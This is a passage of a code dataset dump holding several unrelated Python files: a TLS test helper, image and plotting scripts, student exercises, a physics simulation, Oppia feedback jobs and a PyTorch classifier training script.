ssl.TLSVersion.TLSv1\n elif protocol == Protocols.TLSV1_1:\n return ssl.TLSVersion.TLSv1_1\n elif protocol == Protocols.TLSV1_2:\n return ssl.TLSVersion.TLSv1_2\n else:\n return None\n\n\ndef openssl_cs(cipher_suite):\n \"\"\" Convert CipherSuite to OpenSSL cipher suite name \"\"\"\n\n if cipher_suite == CipherSuites.TLS_AES_256_GCM_SHA384:\n return 'TLS_AES_256_GCM_SHA384'\n elif cipher_suite == CipherSuites.TLS_AES_128_GCM_SHA256:\n return 'TLS_AES_128_GCM_SHA256'\n elif cipher_suite == CipherSuites.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA:\n return 'ECDHE-RSA-AES256-SHA'\n elif cipher_suite == CipherSuites.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA:\n return 'ECDHE-ECDSA-AES256-SHA'\n elif cipher_suite == CipherSuites.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384:\n return 'ECDHE-ECDSA-AES256-GCM-SHA384'\n elif cipher_suite == CipherSuites.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384:\n return 'ECDHE-RSA-AES256-GCM-SHA384'\n else:\n return None\n\n\nCERT_DIR = os.getenv('TLSTEST.CERT.DIR')\n\n\ndef get_cert_path(cert_file):\n return os.path.join(CERT_DIR, cert_file)\n\n\ndef create_context(protocol, cipher_suite):\n \"\"\"\n Create SSL context with specified protocol and cipher suite.\n The CA and end entity certificate are automatically determined by the cipher suite\n \"\"\"\n\n _context = ssl.SSLContext()\n _tls_version = tls_version(protocol)\n _context.minimum_version = _tls_version\n _context.maximum_version = _tls_version\n\n _context.verify_mode = ssl.CERT_REQUIRED\n _context.check_hostname = False\n\n _context.set_ciphers(openssl_cs(cipher_suite))\n\n _cert_group = get_cert_group(cipher_suite.value.key_ex_algo)\n _context.load_verify_locations(\n cafile=get_cert_path(_cert_group.ca.value.cert_file))\n _context.load_cert_chain(\n certfile=get_cert_path(_cert_group.server_cert.value.cert_file),\n keyfile=get_cert_path(_cert_group.server_cert.value.priv_key_file))\n\n return _context\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"634821253","text":"from math import cos, sin, pi\n\nimport numpy as np\nfrom PIL import Image\n\n\ndef rotation(x, y, z, nx, ny, nz, theta):\n r = np.array([x, y, z])\n matrix = np.array([\n [\n cos(theta) + pow(nx, 2) * (1 - cos(theta)),\n nx * ny * (1 - cos(theta)) - nz * sin(theta),\n nz * nx * (1 - cos(theta)) + ny * sin(theta),\n ],\n [\n nx * ny * (1 - cos(theta)) + nz * sin(theta),\n cos(theta) + pow(ny, 2) * (1 - cos(theta)),\n ny * nz * (1 - cos(theta)) - nx * sin(theta),\n ],\n [\n nz * nx * (1 - cos(theta)) - ny * sin(theta),\n ny * nz * (1 - cos(theta)) + nx * sin(theta),\n cos(theta) + pow(nz, 2) * (1 - cos(theta)),\n ],\n ])\n return tuple(map(int, np.dot(r, matrix)))\n\n\ndef main():\n image = Image.open('muta.jpg')\n data = image.getdata()\n\n rgb = image.convert('RGB')\n size = rgb.size\n\n new = Image.new('RGBA', size)\n new_data = []\n for r, g, b in data:\n new_r, new_g, new_b = rotation(r, g, b, 1, 0, 0, pi)\n new_data.append((new_r, new_g, new_b))\n\n new.putdata(new_data)\n\n image.show()\n new.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"art.py","file_name":"art.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"624424014","text":"# Дано натуральное число. Напишите программу, которая вычисляет:\n#\n# сумму его цифр;\n# количество цифр в нем;\n# произведение его цифр;\n# среднее арифметическое его цифр;\n# его первую цифру;\n# сумму его первой и последней цифры.\n\n\ndef sum_of_digits(n):\n summa = 0\n while n > 0:\n a = n % 10\n summa += a\n n = n // 10\n return summa\n\n\ndef number_of_digits(n):\n total = 0\n while n > 0:\n total += 1\n n = n // 10\n return total\n\n\ndef composition_of_digits(n):\n composition = 1\n while n > 0:\n a = n % 10\n composition *= a\n n = n // 10\n return composition\n\n\ndef average_of_digits(n):\n return sum_of_digits(n) / number_of_digits(n)\n\n\ndef one_number(n):\n a = []\n while n > 0:\n a.append(n % 10)\n n = n // 10\n a.reverse()\n return a[0]\n\n\ndef sum_one_and_last(n):\n a = []\n while n > 0:\n a.append(n % 10)\n n = n // 10\n a.reverse()\n return a[0] + a[-1]\n\n\nn = int(input())\nprint(sum_of_digits(n),\n number_of_digits(n),\n composition_of_digits(n),\n average_of_digits(n),\n one_number(n),\n sum_one_and_last(n),\n sep='\\n')\n","sub_path":"Циклы for и while/Цикл while обработка цифр числа/Programming (3)/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"566267776","text":"import math\nimport random\nfrom matplotlib import pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport scipy as sp\nimport scipy.sparse.linalg\n\nimport os\nimport csv\n\nc = 0.61066405858\na = 0.10460487652\neps = 0.010000043396\ngamma = 1\nI = 0.059990663538\np = [I-1,1+a, -a - 1/gamma, I]\nr = np.roots(p)\n\nt = np.arange(-0.1,1, 0.01)\n#plt.figure()\n#plt.plot(t, t*(1-t)*(t-a)+I)\n#plt.plot(t, 1/gamma*t)\n#plt.show() #Plot of nullclines\n\nu0 = 0.0574370906\nv0=0\nw0 = u0/gamma\np0 = [u0,v0,w0] #Fixed point of ODE system\nf = lambda u: u*(1-u)*(u-a) + I\nfp = lambda u: -3*u**2+2*(a+1)*u-a\n\nfp0 = fp(u0)\nDf0 = [[0,1,0],[-fp0, c,1], [eps/c, 0, -eps*gamma/c]]\n(evals, evecs) = np.linalg.eig(Df0)\n\nrho = np.real(evals)[0]\nomega = np.imag(evals)[0] #Real and imaginary parts of the stable eigenvalues\nmu = np.real(evals)[2] #Real unstable eigenvalue\n\n\nv1= [1.96472656, -0.03617067, -0.00258794]\nv1 = v1/np.linalg.norm(v1)\nv2 = [0, -0.31242932, 0.20229302]\nv2 = v2/np.linalg.norm(v2)\nv3 = [ 0.84547515, 0.53358649, 0.02138313]\nv3 = v3/np.linalg.norm(v3)\nP = [v1,v2,v3]\nPinv = np.transpose([v1,v2,v3])\n\nG = lambda x: Pinv.dot(x - p0) #Change of coordinates function\nGinv = lambda x: P.dot(x) + p0\n\ndef solve(ts, init, c, a, eps, gamma, I):\n \"\"\"Solve 3-D traveling wave ODE for times points ts.\"\"\"\n\n F = lambda y, t: tw_ode(y, c, a, eps, gamma, I)\n #print(F(init, ts))\n\n s = sp.integrate.odeint(F, init, ts)\n return s\n\ndef tw_ode(y, c, a, eps, gamma, I):\n \"\"\"return vector field for 3d traveling waves ODE\"\"\"\n\n u = y[0]\n v = y[1]\n w = y[2]\n udot = v\n vdot = c*v-u*(1-u)*(u-a)-I+w\n wdot = eps*(u-gamma*w)/c\n\n return (udot, vdot, wdot)\n\ncwd=os.getcwd()\nfolder= os.path.join(cwd, '..', 'auto','02.07.17')\n\nsolpath = os.path.join(folder, 'run5_solution_33')\nsolcsv = open(solpath, newline='')\n\nt = []\nu = []\nv = []\nw = []\n\n#Load solution 18 from 02.07.17 to python\nfor j in solcsv:\n row=j.split()\n t.append(float(row[0]))\n #x.append([float(row[1]),float(row[2]),float(row[3])])\n u.append(float(row[1]))\n v.append(float(row[2]))\n w.append(float(row[3]))\n\nx = np.array([u,v,w]) #x = solution array from AUTO. Rows are u,v,w\ny = np.apply_along_axis(G, 0, x ) #y = new coordinates. Fixed point now near origin.\nxs = np.arange(-.4, 1, 0.05)\nys = np.arange(-0.1,0.2,0.01)\nzs = np.arange(-0.05,0.04,0.005)\n\nnx = np.zeros(len(xs))\nny = np.zeros(len(ys))\nnz = np.zeros(len(zs))\n\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n\nax.plot(xs,nx,nx) # {y = z = 0} blue\nax.plot(ny,ys,ny) # {x = z = 0} green\nax.plot(nz,nz,zs) # {x = y = 0} red\n#ax.plot(y[0,0:50], y[1,0:50], y[2,0:50])\nax.plot(y[0,200:400],y[1,200:400],y[2,200:400])\n\nplt.show()\n","sub_path":"python/poincare.py","file_name":"poincare.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128449016","text":"#encoding: UTF-8\n#Autor: Marina Itzel Haro Hernández, A01373471\n#Tarea 06 - While\n\n\ndef calcularInsectos():\n insectos = int(input(\"Insectos recolectados hoy\"))\n dia = 1\n while insectos < 30 :\n e = 30 - insectos\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te hace falta recolectar\", e, \"insectos\")\n dia += 1\n insectos2 = int(input(\"Insectos recolectados hoy\"))\n insectos += insectos2\n \n \n if insectos >= 30:\n if insectos == 30:\n e = 30 - insectos\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te hace falta recolectar %d insecto(s)\" % e)\n \n if insectos > 30:\n f = insectos - 30\n print (\"Después de %d día(s) de recolección has acumulado %d insecto(s)\" % (dia, insectos))\n print (\"Te has pasado con %d insecto(s)\" % f)\n \n print (\"Felicidades has llegado a la meta\")\n \n return (dia, insectos)\n \n \n \ndef calcularMayor():\n numero = 0\n m = 0\n while numero != -1 :\n numero = int(input(\"Teclea un número entero positivo\"))\n print(numero)\n if numero > m:\n m = numero\n if m == 0 :\n print(\"No hay datos para encontar el valor mayor.\")\n else:\n print (\"El mayor es:\", m)\n\n \ndef main():\n opcion = 0\n while opcion != 3 :\n print (\"\\n\")\n opcion = int(input(\"1. Encontrar mayor \\n2. Recolectar insectos \\n3. Salir \\nTeclea tu opción\"))\n if opcion == 1 :\n calcularMayor()\n elif opcion == 2 :\n calcularInsectos()\n elif opcion == 3 :\n print(\"Adios\")\n else:\n print(\"Ingresa una oción válida\")\n \nmain()\n \n \n ","sub_path":"Tarea 06.py","file_name":"Tarea 06.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"333914221","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 17 19:12:35 2017\r\n\r\n@author: Olivia\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage.filters import gaussian_filter\r\n \r\n\r\nclass one_dim_Distribution(object):\r\n '''A one_dim_Distribution object is a distribution of charged particles \r\n along a line. There is an electric field defined by a magnitude (V/micron) \r\n and starting and ending positions along the line. The position of \r\n charged particles can be updated to reflect movement over time under the \r\n effects of drift and diffusion.\r\n\r\n Input:\r\n FRACTION_FAST_NEG (fraction of defects which are negative and have \r\n mobilities on the order of 10^-10 cm^2/Vsec)\r\n FRACTION_FAST_POS (fraction of defects which are positive and have \r\n mobilities on the order of 10^-10 cm^2/Vsec)\r\n FRACTION_SLOW_NEG (fraction of defects which are negative and have \r\n mobilities on the order of 10^-11 cm^2/Vsec)\r\n FRACTION_SLOW_POS (fraction of defects which are positive and have \r\n mobilities on the order of 10^-11 cm^2/Vsec) \r\n ELECTRIC_FIELD_STRENGTH (voltage applied accross electrodes)\r\n MOBILITY_POS (mobilitiy of fast, positive defects, micron^2/Vhr)\r\n MOBILITY_NEG (mobilitiy of fast, negative defects, micron^2/Vhr)\r\n MOBILITY_POS_SLOW (mobilitiy of slow, positive defects, micron^2/Vhr)\r\n MOBILITY_NEG_SLOW (mobilitiy of slow, negative defects, micron^2/Vhr)\r\n \r\n BIASED_WIDTH (distance between electrodes, microns)\r\n SAMPLE_SIZE (x-dimension of sample region, microns)\r\n DEFECT_CONC (number of defects per square micron)\r\n \r\n \r\n Initialization: initializing a Distribution object randomly generates a \r\n list of particle positions, with the length of the list given by the \r\n DEFECT_CONC and SAMPLE_SIZE'''\r\n \r\n def __init__ (self,FRACTION_FAST_NEG,FRACTION_FAST_POS,FRACTION_SLOW_NEG,\r\n FRACTION_SLOW_POS,ELECTRIC_FIELD_STRENGTH,MOBILITY_POS,\r\n MOBILITY_NEG,MOBILITY_POS_SLOW,MOBILITY_NEG_SLOW,\r\n BIASED_WIDTH,SAMPLE_SIZE,DEFECT_CONC):\r\n \r\n self.FRACTION_FAST_NEG = FRACTION_FAST_NEG\r\n self.FRACTION_FAST_POS = FRACTION_FAST_POS\r\n self.FRACTION_SLOW_POS = FRACTION_SLOW_POS\r\n self.FRACTION_SLOW_NEG = FRACTION_SLOW_NEG \r\n self.BIASED_WIDTH = BIASED_WIDTH \r\n self.DEFECT_CONC = DEFECT_CONC\r\n self.SAMPLE_SIZE = SAMPLE_SIZE\r\n self.ELECTRIC_FIELD_STRENGTH = ELECTRIC_FIELD_STRENGTH\r\n self.MOBILITY_POS = MOBILITY_POS\r\n self.MOBILITY_NEG = MOBILITY_NEG\r\n self.MOBILITY_POS_SLOW = MOBILITY_POS_SLOW\r\n self.MOBILITY_NEG_SLOW = MOBILITY_NEG_SLOW\r\n \r\n self.DIFFUSIVITY_POS = self.MOBILITY_POS*0.0257\r\n self.DIFFUSIVITY_NEG = self.MOBILITY_NEG*0.0257\r\n self.DIFFUSIVITY_POS_SLOW = self.MOBILITY_POS_SLOW*0.0257\r\n self.DIFFUSIVITY_NEG_SLOW = self.MOBILITY_NEG_SLOW*0.0257\r\n #um^2/min, D = mukBT/q \r\n \r\n self.DIFFUSION_STD_POS = (2.0*self.DIFFUSIVITY_POS)**0.5\r\n self.DIFFUSION_STD_NEG = (2.0*self.DIFFUSIVITY_NEG)**0.5\r\n self.DIFFUSION_STD_POS_SLOW = (2.0*self.DIFFUSIVITY_POS_SLOW)**0.5\r\n self.DIFFUSION_STD_NEG_SLOW = (2.0*self.DIFFUSIVITY_NEG_SLOW)**0.5\r\n #varience = 2Dt\r\n \r\n self.BIASED_REGION_START = int(self.SAMPLE_SIZE/2- self.BIASED_WIDTH/2) \r\n self.BIASED_REGION_END = int(self.SAMPLE_SIZE/2 + self.BIASED_WIDTH/2)\r\n \r\n ELECTRIC_FIELD = [0 for n in range(self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD2 = [self.ELECTRIC_FIELD_STRENGTH/self.BIASED_WIDTH \r\n for m in range(self.BIASED_REGION_END-self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD3 = [0 for n in range(self.SAMPLE_SIZE-\r\n self.BIASED_REGION_END)]\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD2)\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD3)\r\n self.ELECTRIC_FIELD = ELECTRIC_FIELD\r\n \r\n self.DRIFT_STRENGTH_POS = (self.MOBILITY_POS*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n self.DRIFT_STRENGTH_NEG = (self.MOBILITY_NEG*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n self.DRIFT_STRENGTH_POS_SLOW = (self.MOBILITY_POS_SLOW*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n self.DRIFT_STRENGTH_NEG_SLOW = (self.MOBILITY_NEG_SLOW*\r\n np.asfarray(self.ELECTRIC_FIELD))\r\n \r\n self.defects = self.SAMPLE_SIZE*np.random.rand(int(self.DEFECT_CONC*\r\n self.SAMPLE_SIZE))\r\n \r\n \r\n def update_defects(self,step):\r\n ''' Update the location of each defect.'''\r\n \r\n if step % 5 != 0:\r\n self.update_electric_field() \r\n \r\n #Defects of varied sign (negative (n) or positive (p)) and mobility \r\n # (fast (f) or slow (s)) are differentiated by their position in \r\n #the list of defects. The order of the defect types is:\r\n #[neg fast, neg slow, pos fast, pos slow] and the start and end of \r\n #each type is defined by the fraction of defects which are each type\r\n nf_end = int(len(self.defects)*self.FRACTION_FAST_NEG) \r\n #index indicating end of negative, fast defects\r\n ns_end = nf_end + int(len(self.defects)*self.FRACTION_SLOW_NEG)\r\n #index indicating end of negative, slow defects\r\n pf_end = ns_end + int(len(self.defects)*self.FRACTION_FAST_POS)\r\n #index indicating end of positive, fast defects. The rest of the \r\n #defects in the list are positive, slow defects\r\n \r\n movement_values = [0 for x in range(len(self.defects))]\r\n \r\n #NEGATIVE DEFECTS\r\n for point in range(ns_end):\r\n if point in range(0,nf_end):\r\n #Drift\r\n movement_values[point] -= \\\r\n self.DRIFT_STRENGTH_NEG[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_NEG)\r\n if point in range(nf_end,ns_end):\r\n #Drift\r\n movement_values[point] -= \\\r\n self.DRIFT_STRENGTH_NEG_SLOW[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_NEG_SLOW)\r\n \r\n #POSITIVE DEFECTS\r\n for point in range(ns_end,len(self.defects)):\r\n if point in range(ns_end,pf_end):\r\n #Drift\r\n movement_values[point] += \\\r\n self.DRIFT_STRENGTH_POS[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_POS)\r\n if point in range(pf_end,len(self.defects)):\r\n #Drift\r\n movement_values[point] += \\\r\n self.DRIFT_STRENGTH_POS_SLOW[int(self.defects[point])]\r\n #Diffusion\r\n movement_values[point] += \\\r\n np.random.normal(0,self.DIFFUSION_STD_POS_SLOW)\r\n \r\n self.defects += movement_values \r\n \r\n #Handle defects which go off the end of the sample\r\n for point in range(len(self.defects)):\r\n if self.defects[point] < 0.0:\r\n self.defects[point] = 1\r\n if self.defects[point] >= self.SAMPLE_SIZE:\r\n self.defects[point] = self.SAMPLE_SIZE-1\r\n \r\n# \r\n def update_electric_field(self):\r\n '''Update the electric field based on the applied voltage and the\r\n location of charged defects'''\r\n \r\n E = self.get_ELECTRIC_FIELD()\r\n defects = np.round(self.get_defects(),0)\r\n FRACTION_NEG = self.FRACTION_FAST_NEG + self.FRACTION_SLOW_NEG\r\n \r\n for n in range(self.SAMPLE_SIZE):\r\n distance = np.asarray(defects - n)\r\n if FRACTION_NEG >= 1.0:\r\n elec_change_pos = 0\r\n else:\r\n elec_change_pos = -(8.00 *10**-5* 1/(distance[int(len(defects)*\r\n FRACTION_NEG):])**2)*np.sign(distance[int(len(defects)*\r\n FRACTION_NEG):])\r\n if FRACTION_NEG <= 0:\r\n elec_change_neg = 0\r\n else:\r\n elec_change_neg = (8.00 *10**-5*1/(distance[:int(len(defects)*\r\n FRACTION_NEG)])**2)*np.sign(distance[:int(len(defects)*\r\n FRACTION_NEG)])\r\n \r\n E[n] += np.nansum(elec_change_neg) + np.nansum(elec_change_pos)\r\n \r\n self.DRIFT_STRENGTH_POS = self.MOBILITY_POS*np.asfarray(E)\r\n self.DRIFT_STRENGTH_NEG = self.MOBILITY_NEG*np.asfarray(E)\r\n self.DRIFT_STRENGTH_POS_SLOW = self.MOBILITY_POS_SLOW*np.asfarray(E)\r\n self.DRIFT_STRENGTH_NEG_SLOW = self.MOBILITY_NEG_SLOW*np.asfarray(E)\r\n \r\n def plot_electric_field(self):\r\n '''Plot the current electric field along the sample'''\r\n \r\n x = [1 + m for m in range(0,self.SAMPLE_SIZE)]\r\n E = self.DRIFT_STRENGTH_POS/self.MOBILITY_POS\r\n plt.plot(x,E)\r\n \r\n def get_ELECTRIC_FIELD(self):\r\n '''Get the electric field at each micron size step along the sample'''\r\n ELECTRIC_FIELD = [0 for n in range(self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD2 = [self.ELECTRIC_FIELD_STRENGTH/self.BIASED_WIDTH for \r\n m in range(self.BIASED_REGION_END-self.BIASED_REGION_START)]\r\n ELECTRIC_FIELD3 = [0 for n in range(self.SAMPLE_SIZE-\r\n self.BIASED_REGION_END)]\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD2)\r\n ELECTRIC_FIELD.extend(ELECTRIC_FIELD3)\r\n return ELECTRIC_FIELD\r\n \r\n def get_histogram(self,data,color):\r\n '''Plot a histogram of the defect positions'''\r\n \r\n smoothed = gaussian_filter(data, sigma=2)\r\n plt.plot(smoothed,)\r\n plt.axis([0,self.SAMPLE_SIZE,15,self.DEFECT_CONC+5])\r\n plt.xlabel(\"Distance (um)\")\r\n plt.ylabel(\"Number of Defects\")\r\n plt.title(\"Defect Migration\")\r\n \r\n def get_defects(self):\r\n '''Get the current positions of all defects'''\r\n return self.defects\r\n \r\ndef main():\r\n \r\n MOBILITY_POS = 3.5*10**-10*(10**4)*(10**4)*60*60\r\n #um^2/Vhr\r\n MOBILITY_NEG = 3.825*10**-10*(10**4)*(10**4)*60*60\r\n #um^2/Vhr\r\n MOBILITY_POS_SLOW = 1.8*10**-11*(10**4)*(10**4)*60*60\r\n MOBILITY_NEG_SLOW = 1.8*10**-11*(10**4)*(10**4)*60*60\r\n BIASED_WIDTH = 195\r\n #um\r\n SAMPLE_SIZE = 400\r\n DEFECT_CONC = 50\r\n \r\n FRACTION_SLOW_NEG = 0.32\r\n FRACTION_SLOW_POS = 0.39\r\n FRACTION_FAST_NEG = 0.18\r\n FRACTION_FAST_POS = 0.11\r\n #Defects/um, about 10^16 defects/cm^3\r\n \r\n ELECTRIC_FIELD_STRENGTH = 12\r\n\r\n plt.figure()\r\n curves = []\r\n colors = [\"black\",\"red\", \"orangered\", \"orange\",\"yellow\",\"lime\",\"cyan\",\r\n \"skyblue\",\"blue\",\"darkviolet\",\"magenta\"]\r\n \r\n for smooth in range(10):\r\n #Simulation is run 10 times and averaged\r\n \r\n dist = one_dim_Distribution(FRACTION_FAST_NEG,FRACTION_FAST_POS,\r\n FRACTION_SLOW_NEG,FRACTION_SLOW_POS,\r\n ELECTRIC_FIELD_STRENGTH,MOBILITY_POS,\r\n MOBILITY_NEG,MOBILITY_POS_SLOW,\r\n MOBILITY_NEG_SLOW,BIASED_WIDTH,\r\n SAMPLE_SIZE,DEFECT_CONC)\r\n \r\n curve_smooth = []\r\n curve_smooth.append(np.histogram(dist.defects,bins = SAMPLE_SIZE)[0]) \r\n \r\n for time in range(47):\r\n dist.update_defects(time)\r\n if time in [0,1,2,3,4,5,22,27,30]:\r\n curve_smooth.append(np.histogram(dist.defects,\r\n bins = SAMPLE_SIZE)[0])\r\n curves.append(curve_smooth)\r\n \r\n average = np.average(curves,0)\r\n \r\n for timestamp in range(len(curves[0])): \r\n dist.get_histogram(average[timestamp],colors[timestamp])\r\n \r\n plt.savefig(\"1D_defect_migration.jpg\")\r\n plt.close()\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"1D_model.py","file_name":"1D_model.py","file_ext":"py","file_size_in_byte":12501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192158920","text":"# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"One-off jobs for feedback.\"\"\"\n\nimport ast\nimport logging\n\nfrom constants import constants\nfrom core import jobs\nfrom core.domain import feedback_services\nfrom core.platform import models\n\n(feedback_models,) = models.Registry.import_models([models.NAMES.feedback])\n\n\nclass FeedbackThreadMessagesCountOneOffJob(jobs.BaseMapReduceOneOffJobManager):\n \"\"\"One-off job for calculating the number of messages in a thread.\"\"\"\n\n @classmethod\n def entity_classes_to_map_over(cls):\n return [feedback_models.FeedbackMessageModel]\n\n @staticmethod\n def map(item):\n yield (item.thread_id, item.message_id)\n\n @staticmethod\n def reduce(key, stringified_message_ids):\n message_ids = [\n ast.literal_eval(v) for v in stringified_message_ids]\n\n thread_model = feedback_models.FeedbackThreadModel.get(key)\n next_message_id = max(message_ids) + 1\n thread_model.message_count = next_message_id\n thread_model.put(update_last_updated_time=False)\n\n if next_message_id != len(message_ids):\n exploration_and_thread_id = key.split('.')\n exploration_id = exploration_and_thread_id[0]\n thread_id = exploration_and_thread_id[1]\n thread = feedback_services.get_thread(exploration_id, thread_id)\n logging.error(\n 'The number of messages in the thread, given by the id %s is %s'\n '. But the number of messages as estimated by the message ids '\n 'is %s. Therefore the estimate is not equal to the actual '\n 'number of messages.' % (\n key, len(message_ids), next_message_id))\n\n yield ('error', {\n 'subject': thread.subject,\n 'exploration_id': exploration_id,\n 'thread_id': thread_id,\n 'next_message_id': next_message_id,\n 'message_count': len(message_ids)\n })\n\n\nclass FeedbackSubjectOneOffJob(jobs.BaseMapReduceOneOffJobManager):\n \"\"\"One-off job for updating the feedback subject.\"\"\"\n\n DEFAULT_SUBJECT = u'(Feedback from a learner)'\n\n @classmethod\n def entity_classes_to_map_over(cls):\n return [feedback_models.FeedbackThreadModel]\n\n @staticmethod\n def map(item):\n if item.subject != FeedbackSubjectOneOffJob.DEFAULT_SUBJECT:\n return\n\n first_message = feedback_services.get_message(\n item.exploration_id, item.thread_id, 0)\n\n if not first_message.text:\n return\n\n if len(first_message.text) > constants.FEEDBACK_SUBJECT_MAX_CHAR_LIMIT:\n updated_subject = first_message.text[\n :constants.FEEDBACK_SUBJECT_MAX_CHAR_LIMIT]\n\n if ' ' in updated_subject:\n updated_subject = ' '.join(updated_subject.split(' ')[:-1])\n\n item.subject = updated_subject + '...'\n else:\n item.subject = first_message.text\n item.put(update_last_updated_time=False)\n\n @staticmethod\n def reduce(key, value):\n pass\n","sub_path":"core/domain/feedback_jobs_one_off.py","file_name":"feedback_jobs_one_off.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194826710","text":"# -*- coding:utf-8 -*-\nimport data_utilities\nimport mysql\nimport math\n\ndef predict(person, destination=0, data_set='univ'):\n\tmean_person = get_mean(person, destination, data_set=data_set)\n\treturn mean_person\n\ndef get_mean(person, destination=0, data_set='univ'):\n\tx, y = person['x'], person['y']\n\tcnx = mysql.connector.connect(user='kyota', host='127.0.0.1', database=data_set)\n\tcursor = cnx.cursor()\n\n\t_person = person.copy()\n\t# floor_x, ceil_x = math.floor(x), math.ceil(x)\n\t# floor_y, ceil_y = math.floor(y), math.ceil(y)\n\tx, y = int(round(x)), int(round(y))\n\n\ttable = get_table_name(destination)\n\twhere = \"`round(x)` = \"+str(x)+\" and `round(y)` = \"+str(y)\n\tquery = \"select `mean(v)`, `mean(theta)` from \"+table+\" where \"+where\n\tcursor.execute(query)\n\trow = cursor.fetchone()\n\tif (row):\n\t\tv, theta = float(row[0]), float(row[1])\n\t\t_person['v'], _person['theta'] = v, theta\n\t\t_person = data_utilities.set_vx_vy(_person)\n\t\treturn _person\n\treturn {'x': 0, 'y': 0, 'vx': 0, 'vy': 0}\n\ndef get_table_name(destination=0):\n\ttable_name = \"\"\n\tif (destination > 0):\n\t\ttable_name = \"stats_vx_plus\"\n\telif (destination < 0):\n\t\ttable_name = \"stats_vx_minus\"\n\telse:\n\t\ttable_name = [\"stats_vx_plus\", \"stats_vx_minus\"]\n\treturn table_name\n\n","sub_path":"researchs/tracking/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"83972868","text":"\nfrom Task3loader import Task3_loader\nfrom Task1Loader import Task1_loader\nfrom runner import *\nfrom face_recognition import FaceRecog\nimport torch\nfrom torch import nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom pytorchcv.model_provider import get_model\nimport torchvision.models as models\n\nimport os\n\nclass Head(torch.nn.Module):\n def __init__(self, in_f, out_f):\n super(Head, self).__init__()\n \n self.f = nn.Flatten()\n self.l = nn.Linear(in_f, 512)\n self.d = nn.Dropout(0.75)\n self.o = nn.Linear(512, out_f)\n self.b1 = nn.BatchNorm1d(in_f)\n self.b2 = nn.BatchNorm1d(512)\n self.r = nn.ReLU()\n\n def forward(self, x):\n x = self.f(x)\n x = self.d(x)\n\n x = self.l(x)\n x = self.r(x)\n x = self.d(x)\n\n out = self.o(x)\n return out\n\nclass FCN(torch.nn.Module):\n def __init__(self, base, in_f):\n super(FCN, self).__init__()\n self.base = base\n self.h1 = Head(in_f, 1)\n self.classif = nn.Sigmoid()\n \n def forward(self, x):\n x = self.base(x)\n x = self.h1(x)\n return x, self.classif(x)\n\n\ndef main():\n\n batch_size = 20\n\n # model = models.resnet18(pretrained=False)\n model = get_model(\"xception\", pretrained=True)\n model = nn.Sequential(*list(model.children())[:-1]) # Remove original output layer\n\n model[0].final_block.pool = nn.Sequential(nn.AdaptiveAvgPool2d(1)) # xcep\n model = FCN(model, 2048)\n model.cuda()\n train_data = Task3_loader()\n test_data = Task1_loader(\"./Task_2_3/test.csv\", phase='test')\n\n train_loader = DataLoader(train_data, batch_size=batch_size, shuffle=True, num_workers=8)\n valid_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=8)\n\n\n criterion = nn.BCELoss()\n # optimizer = optim.SGD(model.parameters(), lr=0.0018, momentum=0.27)\n optimizer = optim.Adam(model.parameters(), lr=1e-4, weight_decay=1e-5)\n\n train(model, train_loader, valid_loader, criterion, optimizer, 100, 